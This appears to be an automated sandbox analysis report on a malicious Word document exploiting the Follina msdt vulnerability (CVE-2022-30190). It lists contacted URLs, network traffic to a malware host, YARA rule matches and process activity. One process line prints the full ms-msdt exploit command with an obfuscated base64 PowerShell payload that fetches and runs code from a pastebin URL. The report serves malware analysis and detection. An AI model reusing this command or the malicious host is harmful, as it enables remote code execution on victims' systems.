          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://roaming.edog.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://settings.outlook.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://staging.cortana.ai
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://tasks.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://wus2.contentsync.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: ~WRS{D36977B3-ADC1-4109-A787-B8962B69C0CF}.tmp.0.drString found in binary or memory: https://www.malwarejake.com/456.html
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: unknownDNS traffic detected: queries for: www.malwarejake.com
          Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: www.malwarejake.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /456.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: www.malwarejake.comIf-Modified-Since: Tue, 31 May 2022 01:57:49 GMTIf-None-Match: "1b90-5e045198f8aaa"Connection: Keep-Alive
          Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49744 version: TLS 1.2

          System Summary

          Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
          Source: sslproxydump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
          Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
          Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 00000005.00000002.619006579.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: Process Memory Space: msdt.exe PID: 5472, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: DiagPackage.dll.mui.5.dr | Static PE information: No import functions for PE file found
          Source: DiagPackage.dll.5.dr | Static PE information: No import functions for PE file found
          Source: DiagPackage.dll.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
          Source: qoIZSkdejM.docx | Virustotal: Detection: 35%
          Source: qoIZSkdejM.docx | Metadefender: Detection: 22%
          Source: qoIZSkdejM.docx | ReversingLabs: Detection: 44%
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"
          Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
          Source: qoIZSkdejM.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\qoIZSkdejM.docx
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{339CE15B-6A00-4ACA-8F52-6DF2F427972A} - OProcSessId.dat
          Source: classification engine | Classification label: mal100.expl.evad.winDOCX@14/31@2/1
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

          Persistence and Installation Behavior

          Source: document.xml.rels | Extracted files from sample: https://www.malwarejake.com/456.html!
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.dll
          Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.mui
          Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
